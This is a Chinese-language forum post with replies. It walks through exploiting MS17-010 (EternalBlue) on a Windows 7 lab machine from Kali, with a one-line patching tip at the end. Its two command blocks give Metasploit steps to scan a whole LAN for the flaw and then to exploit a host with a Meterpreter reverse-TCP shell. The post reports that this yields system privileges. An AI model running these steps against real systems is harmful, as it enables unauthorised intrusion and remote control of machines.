ms17-010实战

libo · 发表于 2020-5-5 15:19:44

本帖最后由 libo 于 2020-5-5 15:22 编辑

[md]> ms17-010 可以说是当前影响最大额一次漏洞了。在各个领域都受到了不少的冲击。今天我们一起来了解下！

![timg.jpg](data/attachment/forum/202005/05/152139xz9766k5zv2th7to.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "timg.jpg")

### 环境

* kali Linux
* win7(靶机)

### 漏洞扫描

```
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.123.1/24 #扫描整个局域网
exploit
```

![QQ 鎴?浘 20200505150950.png](data/attachment/forum/202005/05/151009gd5fdi4yzi6f1if1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "扫描")
如上，我们发现在局域网中，设备 `192.168.123.66` 存在 ms17-010 漏洞。

### 漏洞利用

```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.123.66
set payload windows/x64/meterpreter/reverse_tcp
exploti
```

![QQ 鎴?浘 20200505151604.png](data/attachment/forum/202005/05/151622xh6j0it01kfivc20.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "ms17-010")
成功拿下系统权限。

### 防御

请及时更新系统补丁，和安装安全软件进行系统检查。
[/md]

libo · 发表于 2020-5-5 15:24:12

漏洞虽然早就过时了，但是研究的心态却从未停止。:daxiao:

莫言 · 发表于 2020-5-5 17:58:31

新手支持下！

ms17-010实战

本帖子中包含更多资源

注册会员

活跃会员

热心会员